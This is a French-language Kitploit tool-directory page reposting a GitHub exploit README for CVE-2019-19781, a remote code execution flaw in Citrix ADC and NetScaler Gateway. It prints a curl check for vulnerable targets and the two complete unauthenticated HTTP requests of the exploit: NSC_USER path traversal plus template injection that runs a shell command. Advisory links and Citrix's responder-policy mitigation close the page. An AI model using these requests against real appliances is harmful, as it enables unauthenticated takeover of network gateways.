Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2019-19781 — CVE-2019-19781 - Exploit d'exécution de code à distance sur Citrix ADC Netscaler | Kitploit
Outils/GitHubGitHub/mpgn/cve-2019-19781
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionRéponse aux IncidentsOutil d'Accès à Distance
GitHubmpgn/cve-2019-19781

CVE-2019-19781

CVE-2019-19781 - Exploit d'exécution de code à distance sur Citrix ADC Netscaler

Voir le dépôt
157343il y a 6 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2019-19781

Exécution de code à distance (RCE) dans Citrix Application Delivery Controller et Citrix Gateway

Une vulnérabilité a été identifiée dans Citrix Application Delivery Controller (ADC), anciennement connu sous le nom de NetScaler ADC, et Citrix Gateway, anciennement connu sous le nom de NetScaler Gateway. Si elle est exploitée, elle pourrait permettre à un attaquant non authentifié d'exécuter du code arbitraire.

EDIT : Scanner d'indicateurs de compromission pour CVE-2019-19781 de Fireeye -> https://github.com/fireeye/ioc-scanner-CVE-2019-19781/

Produits concernés :

  • Citrix ADC et Citrix Gateway version 13.0, toutes les builds prises en charge
  • Citrix ADC et NetScaler Gateway version 12.1, toutes les builds prises en charge
  • Citrix ADC et NetScaler Gateway version 12.0, toutes les builds prises en charge
  • Citrix ADC et NetScaler Gateway version 11.1, toutes les builds prises en charge
  • Citrix NetScaler ADC et NetScaler Gateway version 10.5, toutes les builds prises en charge

image

Vérifier si la cible est vulnérable

root@kitploit:~
TARGET=your_ip
curl -vk –path-as-is https://$TARGET/vpn/../vpns/ 2>&1 | grep “You don’t have permission to access /vpns/” >/dev/null && echo “VULNERABLE: $TARGET” || echo “MITIGATED: $TARGET”

Script Perl vulnérable

root@kitploit:~
POST /vpn/../vpns/portal/scripts/newbm.pl
POST /vpn/../vpns/portal/scripts/rmbm.pl
GET /vpn/../vpns/portal/scripts/picktheme.pl

Exploitation

Seulement deux requêtes sont nécessaires pour exploiter cette vulnérabilité sans aucune authentification !

Première requête :

root@kitploit:~
POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Host: 3.81.59.87
NSC_USER: ../../../../netscaler/portal/templates/randomletter
NSC_NONCE: c
Connection: close
Content-Length: 103

url=http://exemple.com&title=[%t=template.new({'BLOCK'='print `uname -a`'})%][% t %]&desc=test&UI_inuse=RfWeb

Deuxième requête :

root@kitploit:~
GET /vpns/portal/bonclay4.xml HTTP/1.1
Host: 3.81.59.87
NSC_USER: ../../../../netscaler/portal/templates/randomletter
NSC_NONCE: c
Connection: close

image

Analyse détaillée (anglais) :

  • Craig Young => https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/
  • @MDSecLabs => https://www.mdsec.co.uk/2020/01/deep-dive-in-to-citrix-adc-remote-code-execution-cve-2019-19781/
  • @mpgn_x64 => https://twitter.com/mpgn_x64/status/1214544993261674497

Avis de sécurité :

  • https://support.citrix.com/article/CTX267027

Correctif (pas un vrai correctif)

  • https://support.citrix.com/article/CTX267679
root@kitploit:~
enable ns feature responder
add responder action respondwith403 respondwith "\"HTTP/1.1 403 Forbidden\r\n\r\n\""
add responder policy ctx267027 "HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\"/vpns/\") && (!CLIENT.SSLVPN.IS_SSLVPN || HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\"/../\"))" respondwith403
bind responder global ctx267027 1 END -type REQ_OVERRIDE
save config 
Télécharger l’outil